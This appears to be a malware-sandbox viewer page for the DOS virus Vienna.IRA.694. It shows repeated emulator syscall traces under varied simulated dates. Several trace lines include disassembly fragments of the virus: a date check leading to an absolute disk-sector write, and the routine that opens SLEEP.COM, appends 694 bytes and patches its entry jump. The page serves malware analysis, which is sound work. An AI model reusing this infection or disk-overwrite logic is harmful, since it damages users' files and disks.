Sample viewer

vx.netlux.org/Virus.DOS.Vienna.IRA.694

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:25:43.78285192Z	48	PC: 12a6b \| Get DOS version
2018-12-17T22:25:43.784514365Z	47	PC: 12a77 \| Get disk transfer address
2018-12-17T22:25:43.785631813Z	26	PC: 12a8a \| Set disk transfer address
2018-12-17T22:25:43.786583042Z	42	PC: 12a9a \| Get date 0x12a9a: cmp dh, 5 0x12a9d: jge 0x12aa2 0x12a9f: jmp 0x12ac1 0x12aa1: nop 0x12aa2: mov ah, 0x2a 0x12aa4: int 0x21 0x12aa6: cmp dl, 0x11 0x12aa9: jge 0x12aae 0x12aab: jmp 0x12ac1 0x12aad: nop 0x12aae: mov al, 2 0x12ab0: mov cx, 1 0x12ab3: mov dx, 0 0x12ab6: mov ds, word ptr [di + 0x37] 0x12ab9: mov bx, word ptr [di + 0x63] 0x12abc: int 0x26 0x12abe: jmp 0x12ac1 0x12ac0: nop 0x12ac1: pop si 0x12ac2: push si
2018-12-17T22:25:43.788430564Z	42	PC: 12aa6 \| Get date 0x12aa6: cmp dl, 0x11 0x12aa9: jge 0x12aae 0x12aab: jmp 0x12ac1 0x12aad: nop 0x12aae: mov al, 2 0x12ab0: mov cx, 1 0x12ab3: mov dx, 0 0x12ab6: mov ds, word ptr [di + 0x37] 0x12ab9: mov bx, word ptr [di + 0x63] 0x12abc: int 0x26 0x12abe: jmp 0x12ac1 0x12ac0: nop 0x12ac1: pop si 0x12ac2: push si 0x12ac3: add si, 0x31 0x12ac6: nop 0x12ac7: lodsb al, byte ptr [si] 0x12ac8: mov cx, 0x8000 0x12acb: repne scasb al, byte ptr es:[di] 0x12acd: mov cx, 4

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4550,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:52:08.31900789Z	48	PC: 12a6b \| Get DOS version
2018-12-25T11:52:08.320479104Z	47	PC: 12a77 \| Get disk transfer address
2018-12-25T11:52:08.322234836Z	26	PC: 12a8a \| Set disk transfer address
2018-12-25T11:52:08.323617693Z	42	PC: 12a9a \| Get date 0x12a9a: cmp dh, 5 0x12a9d: jge 0x12aa2 0x12a9f: jmp 0x12ac1 0x12aa1: nop 0x12aa2: mov ah, 0x2a 0x12aa4: int 0x21 0x12aa6: cmp dl, 0x11 0x12aa9: jge 0x12aae 0x12aab: jmp 0x12ac1 0x12aad: nop 0x12aae: mov al, 2 0x12ab0: mov cx, 1 0x12ab3: mov dx, 0 0x12ab6: mov ds, word ptr [di + 0x37] 0x12ab9: mov bx, word ptr [di + 0x63] 0x12abc: int 0x26 0x12abe: jmp 0x12ac1 0x12ac0: nop 0x12ac1: pop si 0x12ac2: push si
2018-12-25T11:52:08.325951288Z	78	PC: 12b44 \| Find first file
2018-12-25T11:52:08.333045431Z	67	PC: 12b82 \| Get or set file attributes
2018-12-25T11:52:08.339478862Z	67	PC: 12b94 \| Get or set file attributes
2018-12-25T11:52:08.359620871Z	61	PC: 12b9f \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:08.367397777Z	87	PC: 12bab \| Get or set file date and time
2018-12-25T11:52:08.369031205Z	44	PC: 12bb7 \| Get time 0x12bb7: and dh, 7 0x12bba: jmp 0x12bbd 0x12bbc: nop 0x12bbd: mov ah, 0x3f 0x12bbf: mov cx, 3 0x12bc2: mov dx, 0x21 0x12bc5: nop 0x12bc6: add dx, si 0x12bc8: int 0x21 0x12bca: jb 0x12c21 0x12bcc: cmp ax, 3 0x12bcf: jne 0x12c21 0x12bd1: mov ax, 0x4202 0x12bd4: mov cx, 0 0x12bd7: mov dx, 0 0x12bda: int 0x21 0x12bdc: jb 0x12c21 0x12bde: mov cx, ax 0x12be0: sub ax, 3 0x12be3: mov word ptr [si + 0x25], ax
2018-12-25T11:52:08.371694075Z	63	PC: 12bca \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:08.376258411Z	66	PC: 12bdc \| Move file pointer
2018-12-25T11:52:08.377346936Z	64	PC: 12c00 \| Write file or device (Write 694 bytes on handle 5)
2018-12-25T11:52:08.38728027Z	66	PC: 12c12 \| Move file pointer
2018-12-25T11:52:08.389529285Z	64	PC: 12c21 \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:08.399767485Z	87	PC: 12c34 \| Get or set file date and time
2018-12-25T11:52:08.401840634Z	62	PC: 12c38 \| Close file
2018-12-25T11:52:08.411489477Z	67	PC: 12c47 \| Get or set file attributes
2018-12-25T11:52:08.42454078Z	26	PC: 12c54 \| Set disk transfer address

{"DateBased":true,"Day":1,"Month":5,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4550,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:52:08.380030139Z	48	PC: 12a6b \| Get DOS version
2018-12-25T11:52:08.381434563Z	47	PC: 12a77 \| Get disk transfer address
2018-12-25T11:52:08.382401521Z	26	PC: 12a8a \| Set disk transfer address
2018-12-25T11:52:08.383388727Z	42	PC: 12a9a \| Get date 0x12a9a: cmp dh, 5 0x12a9d: jge 0x12aa2 0x12a9f: jmp 0x12ac1 0x12aa1: nop 0x12aa2: mov ah, 0x2a 0x12aa4: int 0x21 0x12aa6: cmp dl, 0x11 0x12aa9: jge 0x12aae 0x12aab: jmp 0x12ac1 0x12aad: nop 0x12aae: mov al, 2 0x12ab0: mov cx, 1 0x12ab3: mov dx, 0 0x12ab6: mov ds, word ptr [di + 0x37] 0x12ab9: mov bx, word ptr [di + 0x63] 0x12abc: int 0x26 0x12abe: jmp 0x12ac1 0x12ac0: nop 0x12ac1: pop si 0x12ac2: push si
2018-12-25T11:52:08.385711252Z	42	PC: 12aa6 \| Get date 0x12aa6: cmp dl, 0x11 0x12aa9: jge 0x12aae 0x12aab: jmp 0x12ac1 0x12aad: nop 0x12aae: mov al, 2 0x12ab0: mov cx, 1 0x12ab3: mov dx, 0 0x12ab6: mov ds, word ptr [di + 0x37] 0x12ab9: mov bx, word ptr [di + 0x63] 0x12abc: int 0x26 0x12abe: jmp 0x12ac1 0x12ac0: nop 0x12ac1: pop si 0x12ac2: push si 0x12ac3: add si, 0x31 0x12ac6: nop 0x12ac7: lodsb al, byte ptr [si] 0x12ac8: mov cx, 0x8000 0x12acb: repne scasb al, byte ptr es:[di] 0x12acd: mov cx, 4
2018-12-25T11:52:08.38770997Z	78	PC: 12b44 \| Find first file
2018-12-25T11:52:08.391477781Z	67	PC: 12b82 \| Get or set file attributes
2018-12-25T11:52:08.395049414Z	67	PC: 12b94 \| Get or set file attributes
2018-12-25T11:52:08.416170467Z	61	PC: 12b9f \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:08.422466431Z	87	PC: 12bab \| Get or set file date and time
2018-12-25T11:52:08.423646961Z	44	PC: 12bb7 \| Get time 0x12bb7: and dh, 7 0x12bba: jmp 0x12bbd 0x12bbc: nop 0x12bbd: mov ah, 0x3f 0x12bbf: mov cx, 3 0x12bc2: mov dx, 0x21 0x12bc5: nop 0x12bc6: add dx, si 0x12bc8: int 0x21 0x12bca: jb 0x12c21 0x12bcc: cmp ax, 3 0x12bcf: jne 0x12c21 0x12bd1: mov ax, 0x4202 0x12bd4: mov cx, 0 0x12bd7: mov dx, 0 0x12bda: int 0x21 0x12bdc: jb 0x12c21 0x12bde: mov cx, ax 0x12be0: sub ax, 3 0x12be3: mov word ptr [si + 0x25], ax
2018-12-25T11:52:08.430717019Z	63	PC: 12bca \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:08.436621381Z	66	PC: 12bdc \| Move file pointer
2018-12-25T11:52:08.437820386Z	64	PC: 12c00 \| Write file or device (Write 694 bytes on handle 5)
2018-12-25T11:52:08.446862971Z	66	PC: 12c12 \| Move file pointer
2018-12-25T11:52:08.448438824Z	64	PC: 12c21 \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:08.455039641Z	87	PC: 12c34 \| Get or set file date and time
2018-12-25T11:52:08.45691232Z	62	PC: 12c38 \| Close file
2018-12-25T11:52:08.464448024Z	67	PC: 12c47 \| Get or set file attributes
2018-12-25T11:52:08.473945816Z	26	PC: 12c54 \| Set disk transfer address

{"DateBased":true,"Day":17,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4550,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:52:08.56469682Z	48	PC: 12a6b \| Get DOS version
2018-12-25T11:52:08.568529466Z	47	PC: 12a77 \| Get disk transfer address
2018-12-25T11:52:08.569982358Z	26	PC: 12a8a \| Set disk transfer address
2018-12-25T11:52:08.57123763Z	42	PC: 12a9a \| Get date 0x12a9a: cmp dh, 5 0x12a9d: jge 0x12aa2 0x12a9f: jmp 0x12ac1 0x12aa1: nop 0x12aa2: mov ah, 0x2a 0x12aa4: int 0x21 0x12aa6: cmp dl, 0x11 0x12aa9: jge 0x12aae 0x12aab: jmp 0x12ac1 0x12aad: nop 0x12aae: mov al, 2 0x12ab0: mov cx, 1 0x12ab3: mov dx, 0 0x12ab6: mov ds, word ptr [di + 0x37] 0x12ab9: mov bx, word ptr [di + 0x63] 0x12abc: int 0x26 0x12abe: jmp 0x12ac1 0x12ac0: nop 0x12ac1: pop si 0x12ac2: push si
2018-12-25T11:52:08.574043808Z	78	PC: 12b44 \| Find first file
2018-12-25T11:52:08.588740399Z	67	PC: 12b82 \| Get or set file attributes
2018-12-25T11:52:08.592762179Z	67	PC: 12b94 \| Get or set file attributes
2018-12-25T11:52:08.606560595Z	61	PC: 12b9f \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:08.613257591Z	87	PC: 12bab \| Get or set file date and time
2018-12-25T11:52:08.614609807Z	44	PC: 12bb7 \| Get time 0x12bb7: and dh, 7 0x12bba: jmp 0x12bbd 0x12bbc: nop 0x12bbd: mov ah, 0x3f 0x12bbf: mov cx, 3 0x12bc2: mov dx, 0x21 0x12bc5: nop 0x12bc6: add dx, si 0x12bc8: int 0x21 0x12bca: jb 0x12c21 0x12bcc: cmp ax, 3 0x12bcf: jne 0x12c21 0x12bd1: mov ax, 0x4202 0x12bd4: mov cx, 0 0x12bd7: mov dx, 0 0x12bda: int 0x21 0x12bdc: jb 0x12c21 0x12bde: mov cx, ax 0x12be0: sub ax, 3 0x12be3: mov word ptr [si + 0x25], ax
2018-12-25T11:52:08.616412443Z	63	PC: 12bca \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:08.621819555Z	66	PC: 12bdc \| Move file pointer
2018-12-25T11:52:08.623276841Z	64	PC: 12c00 \| Write file or device (Write 694 bytes on handle 5)
2018-12-25T11:52:08.629715475Z	66	PC: 12c12 \| Move file pointer
2018-12-25T11:52:08.636362986Z	64	PC: 12c21 \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:08.641154148Z	87	PC: 12c34 \| Get or set file date and time
2018-12-25T11:52:08.642617778Z	62	PC: 12c38 \| Close file
2018-12-25T11:52:08.649503168Z	67	PC: 12c47 \| Get or set file attributes
2018-12-25T11:52:08.662050228Z	26	PC: 12c54 \| Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4550,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:52:08.620606178Z	48	PC: 12a6b \| Get DOS version
2018-12-25T11:52:08.622021617Z	47	PC: 12a77 \| Get disk transfer address
2018-12-25T11:52:08.623142774Z	26	PC: 12a8a \| Set disk transfer address
2018-12-25T11:52:08.623883231Z	42	PC: 12a9a \| Get date 0x12a9a: cmp dh, 5 0x12a9d: jge 0x12aa2 0x12a9f: jmp 0x12ac1 0x12aa1: nop 0x12aa2: mov ah, 0x2a 0x12aa4: int 0x21 0x12aa6: cmp dl, 0x11 0x12aa9: jge 0x12aae 0x12aab: jmp 0x12ac1 0x12aad: nop 0x12aae: mov al, 2 0x12ab0: mov cx, 1 0x12ab3: mov dx, 0 0x12ab6: mov ds, word ptr [di + 0x37] 0x12ab9: mov bx, word ptr [di + 0x63] 0x12abc: int 0x26 0x12abe: jmp 0x12ac1 0x12ac0: nop 0x12ac1: pop si 0x12ac2: push si
2018-12-25T11:52:08.626187255Z	78	PC: 12b44 \| Find first file
2018-12-25T11:52:08.631886671Z	67	PC: 12b82 \| Get or set file attributes
2018-12-25T11:52:08.637137953Z	67	PC: 12b94 \| Get or set file attributes
2018-12-25T11:52:08.664233468Z	61	PC: 12b9f \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:08.670712262Z	87	PC: 12bab \| Get or set file date and time
2018-12-25T11:52:08.672382919Z	44	PC: 12bb7 \| Get time 0x12bb7: and dh, 7 0x12bba: jmp 0x12bbd 0x12bbc: nop 0x12bbd: mov ah, 0x3f 0x12bbf: mov cx, 3 0x12bc2: mov dx, 0x21 0x12bc5: nop 0x12bc6: add dx, si 0x12bc8: int 0x21 0x12bca: jb 0x12c21 0x12bcc: cmp ax, 3 0x12bcf: jne 0x12c21 0x12bd1: mov ax, 0x4202 0x12bd4: mov cx, 0 0x12bd7: mov dx, 0 0x12bda: int 0x21 0x12bdc: jb 0x12c21 0x12bde: mov cx, ax 0x12be0: sub ax, 3 0x12be3: mov word ptr [si + 0x25], ax
2018-12-25T11:52:08.67452461Z	63	PC: 12bca \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:08.6810332Z	66	PC: 12bdc \| Move file pointer
2018-12-25T11:52:08.682271999Z	64	PC: 12c00 \| Write file or device (Write 694 bytes on handle 5)
2018-12-25T11:52:08.69052357Z	66	PC: 12c12 \| Move file pointer
2018-12-25T11:52:08.692171374Z	64	PC: 12c21 \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:08.699332345Z	87	PC: 12c34 \| Get or set file date and time
2018-12-25T11:52:08.70061447Z	62	PC: 12c38 \| Close file
2018-12-25T11:52:08.708260846Z	67	PC: 12c47 \| Get or set file attributes
2018-12-25T11:52:08.717746689Z	26	PC: 12c54 \| Set disk transfer address